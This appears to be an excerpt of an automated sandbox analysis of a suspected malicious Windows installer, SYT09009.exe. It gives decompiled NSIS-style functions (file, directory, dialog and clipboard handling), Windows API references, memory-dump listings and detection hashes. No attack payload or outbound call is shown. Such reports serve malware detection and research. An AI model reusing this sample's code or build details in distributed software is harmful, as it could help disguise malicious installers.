Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction Fuzzy Hash: 67D0C972504521AFD2142728AE0889BBB55DB54271702CB36FDA5A26B1DB304C569A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405761, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405761(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405767
0x0040576f
0x00000000
0x00405775
0x00000000

APIs

CreateDirectoryA.KERNEL32(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D08, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D08(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405d0c
0x00405d1c
0x00405d24
0x00000000
0x00405d2b
0x00000000
0x00405d2d

APIs

ReadFile.KERNEL32(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405D37, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D37(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405d3b
0x00405d4b
0x00405d53
0x00000000
0x00405d5a
0x00000000
0x00405d5c

APIs

WriteFile.KERNEL32(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403300, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403300(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x0040330e
0x00403314

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,00403066,?), ref: 0040330E

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D

Uniqueness

Uniqueness Score: -1.00%

Function 00405ABA, Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405ABA(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}

0x00405aba
0x00405acd
0x00405acd
0x00405ad1
0x00000000
0x00000000
0x00405ac4
0x00405ac7
0x00000000
0x00405ac7
0x00000000
0x00405ac4
0x00405ad3

APIs

CharNextA.USER32(?,00403455,"C:\Users\user\Desktop\SYT09009.exe" ,00000020,"C:\Users\user\Desktop\SYT09009.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00405AC7

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 1083c57b7f4745178c71a6651c3ca9c923e8efe26efc9521b350556c87d1c9f6
Instruction ID: e7db52908d3e8830c535cfb70526cc2daabbcaa08dbe50b4a99c3e39ed970d4a
Opcode Fuzzy Hash: 1083c57b7f4745178c71a6651c3ca9c923e8efe26efc9521b350556c87d1c9f6
Instruction Fuzzy Hash: 00C08030208F8057CB10571091644677FF0FAD1700F7C496BF0C163150D13458408F36

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040535C, Relevance: 54.3, APIs: 36, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040535C(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ec04; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004052F0, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E0040618A(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a890;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ebec - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f428, 8);
							__eflags =  *0x42f4cc - _t150;
							if( *0x42f4cc == _t150) {
								E0040521E( *((intOrPtr*)( *0x42a068 + 0x34)), _t150);
							}
							E00404154(1);
							goto L25;
						}
						 *0x429c60 = 2;
						E00404154(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E004041E2(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ebf0, _t150);
						ShowWindow(_v8, 8);
						E004041B0(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f434;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec04 = _t128;
				_v8 = _t128;
				E004041B0( *0x42ebf0);
				 *0x42ebf4 = E00404AA1(4);
				 *0x42ec0c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E0040417B(_a4);
				if(( *0x42f43c & 0x00000003) != 0) {
					ShowWindow( *0x42ebf0, _t150);
					if(( *0x42f43c & 0x00000002) != 0) {
						 *0x42ebf0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E004041B0( *0x42ebe8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f43c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}

0x00405362
0x0040536a
0x0040536d
0x00405375
0x00405378
0x00405507
0x0040550d
0x00405531
0x00405531
0x0040553d
0x00405543
0x00405565
0x00405565
0x0040556b
0x004055c0
0x004055c0
0x004055c3
0x00000000
0x00000000
0x004055c5
0x004055c8
0x004055cb
0x00000000
0x00000000
0x004055d5
0x004055db
0x004055dd
0x004055e0
0x004056dd
0x00000000
0x004056dd
0x004055ef
0x004055fb
0x00405604
0x0040560b
0x0040560f
0x00405612
0x0040561b
0x00405621
0x00405624
0x00405624
0x00405634
0x0040563a
0x0040563d
0x00405648
0x00405648
0x00405649
0x0040564c
0x00405653
0x0040565a
0x00405662
0x00405662
0x00405670
0x00405676
0x00405679
0x00405679
0x00405680
0x00405686
0x0040568f
0x00405696
0x0040569f
0x004056a1
0x004056a4
0x004056b3
0x004056b5
0x004056b8
0x004056b9
0x004056bc
0x004056bd
0x004056be
0x004056be
0x004056c6
0x004056d1
0x004056d7
0x004056d7
0x00000000
0x0040563d
0x0040556d
0x00405573
0x004055a1
0x004055a3
0x004055a9
0x004055b4
0x004055b4
0x004055bb
0x00000000
0x004055bb
0x00405577
0x00405581
0x00000000
0x00405545
0x00405545
0x0040554b
0x00405586
0x00000000
0x0040558d
0x00405554
0x0040555b
0x00405560
0x00000000
0x00405560
0x00405543
0x0040537e
0x00405382
0x0040538a
0x0040538e
0x00405391
0x00405394
0x00405397
0x0040539a
0x0040539b
0x0040539c
0x004053b5
0x004053b8
0x004053c2
0x004053d1
0x004053d9
0x004053e1
0x004053e6
0x004053e9
0x004053f5
0x004053fe
0x00405407
0x00405429
0x0040542f
0x00405440
0x00405445
0x00405453
0x00405461
0x00405461
0x00405466
0x00405474
0x00405474
0x00405479
0x0040547c
0x00405481
0x0040548d
0x00405496
0x004054a3
0x004054b2
0x004054a5
0x004054aa
0x004054aa
0x004054be
0x004054be
0x004054d2
0x004054db
0x004054e4
0x004054f4
0x00405500
0x00405500
0x00000000

APIs

GetDlgItem.USER32 ref: 004053BB
GetDlgItem.USER32 ref: 004053CA
GetClientRect.USER32 ref: 00405407
GetSystemMetrics.USER32 ref: 0040540E
SendMessageA.USER32 ref: 0040542F
SendMessageA.USER32 ref: 00405440
SendMessageA.USER32 ref: 00405453
SendMessageA.USER32 ref: 00405461
SendMessageA.USER32 ref: 00405474
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
ShowWindow.USER32(?,00000008), ref: 004054AA
GetDlgItem.USER32 ref: 004054CB
SendMessageA.USER32 ref: 004054DB
SendMessageA.USER32 ref: 004054F4
SendMessageA.USER32 ref: 00405500
GetDlgItem.USER32 ref: 004053D9

Part of subcall function 004041B0: SendMessageA.USER32 ref: 004041BE

GetDlgItem.USER32 ref: 0040551C
CreateThread.KERNEL32 ref: 0040552A
CloseHandle.KERNEL32(00000000), ref: 00405531
ShowWindow.USER32(00000000), ref: 00405554
ShowWindow.USER32(?,00000008), ref: 0040555B
ShowWindow.USER32(00000008), ref: 004055A1
SendMessageA.USER32 ref: 004055D5
CreatePopupMenu.USER32 ref: 004055E6
AppendMenuA.USER32 ref: 004055FB
GetWindowRect.USER32 ref: 0040561B
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
SendMessageA.USER32 ref: 00405670
OpenClipboard.USER32(00000000), ref: 00405680
EmptyClipboard.USER32 ref: 00405686
GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
GlobalLock.KERNEL32 ref: 00405699
SendMessageA.USER32 ref: 004056AD
GlobalUnlock.KERNEL32(00000000), ref: 004056C6
SetClipboardData.USER32 ref: 004056D1
CloseClipboard.USER32 ref: 004056D7

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
Opcode Fuzzy Hash: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040460D, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040460D(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42a068;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004057F7(0x3fb, _t146);
					E004063D2(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004057F7(0x3fb, _t146);
							if(E00405B7D(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E004060F7(0x429860, _t146);
							_t87 = E00406500(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E004060F7(0x429860, _t146);
								_t89 = E00405B28(0x429860);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429860,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429860) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429860,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405AD6(0x429860);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429860) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404AA1(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ebfc; // 0x82bae7
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404A89(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429850);
									} else {
										E004049C4(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f4e4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E0040419D(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a880 == _t158) {
									E00404566();
								}
								 *0x42a880 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a890;
							_v60 = E0040495E;
							_v56 = _t146;
							_v68 = E0040618A(_t146, 0x42a890, _t166, 0x429c68, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405A8F(_t146);
								_t125 =  *((intOrPtr*)( *0x42f434 + 0x11c));
								if( *((intOrPtr*)( *0x42f434 + 0x11c)) != 0 && _t146 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
									E0040618A(_t146, 0x42a890, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3c0, 0x42a890) != 0) {
										lstrcatA(_t146, 0x42e3c0);
									}
								}
								 *0x42a880 =  *0x42a880 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405AFC(_t146) != 0 && E00405B28(_t146) == 0) {
						E00405A8F(_t146);
					}
					 *0x42ebf8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E0040417B(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E0040417B(_t166);
					E004041B0(_t165);
					_t138 = E00406500(8);
					if(_t138 == 0) {
						L53:
						return E004041E2(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}

0x0040460d
0x00404613
0x00404619
0x00404626
0x00404634
0x00404637
0x0040463f
0x00404645
0x00404645
0x00404651
0x00404654
0x004046c2
0x004046c9
0x004047a0
0x004047a7
0x004047b6
0x004047b6
0x004047ba
0x004047c4
0x004047d1
0x004047d3
0x004047d3
0x004047e1
0x004047e8
0x004047ef
0x004047f2
0x00404829
0x0040482b
0x00404831
0x00404836
0x0040483a
0x0040483c
0x0040483c
0x00404858
0x00000000
0x0040485a
0x0040485d
0x0040486b
0x00404871
0x00404872
0x00404875
0x00404878
0x00000000
0x00404878
0x004047f4
0x004047f6
0x004047fa
0x00000000
0x00000000
0x00000000
0x00000000
0x004047fc
0x004047fc
0x00404809
0x0040480e
0x00000000
0x00000000
0x00404812
0x00404814
0x00404814
0x0040481c
0x0040481e
0x00404821
0x00404824
0x00404827
0x00000000
0x00000000
0x00000000
0x00000000
0x00404827
0x00404884
0x0040488e
0x00404891
0x00404894
0x0040489b
0x0040489b
0x0040489d
0x0040489d
0x004048a2
0x004048a4
0x004048ac
0x004048b3
0x004048b5
0x004048c0
0x004048c0
0x004048b5
0x004048c7
0x004048d0
0x004048da
0x004048e2
0x004048fd
0x004048e4
0x004048ed
0x004048ed
0x004048e2
0x00404902
0x00404907
0x0040490c
0x00404915
0x00404915
0x0040491e
0x00404920
0x00404920
0x0040492c
0x00404934
0x0040493e
0x0040493e
0x00404943
0x00000000
0x00404943
0x004047f2
0x004047a9
0x004047b0
0x00000000
0x00000000
0x00000000
0x004047b0
0x004046cf
0x004046d8
0x004046f2
0x004046f7
0x00404701
0x00404708
0x00404714
0x00404717
0x0040471a
0x00404721
0x00404729
0x0040472c
0x00404730
0x00404737
0x0040473f
0x00404799
0x00404741
0x00404742
0x00404749
0x00404753
0x0040475b
0x00404768
0x0040477c
0x00404780
0x00404780
0x0040477c
0x00404785
0x00404792
0x00404792
0x0040473f
0x00000000
0x004046f7
0x004046e5
0x00000000
0x00000000
0x004046eb
0x00000000
0x00404656
0x00404663
0x0040466c
0x00404679
0x00404679
0x00404680
0x00404686
0x0040468f
0x00404692
0x00404695
0x0040469d
0x004046a0
0x004046a3
0x004046a9
0x004046b0
0x004046b7
0x00404949
0x0040495b
0x004046bd
0x004046c0
0x00000000
0x004046c0
0x004046b7

APIs

GetDlgItem.USER32 ref: 0040465C
SetWindowTextA.USER32(00000000,?), ref: 00404686
SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
CoTaskMemFree.OLE32(00000000), ref: 00404742
lstrcmpiA.KERNEL32(KXCJDFJSKF,0042A890,00000000,?,?), ref: 00404774
lstrcatA.KERNEL32(?,KXCJDFJSKF), ref: 00404780
SetDlgItemTextA.USER32 ref: 00404792

Part of subcall function 004057F7: GetDlgItemTextA.USER32 ref: 0040580A

Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SYT09009.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
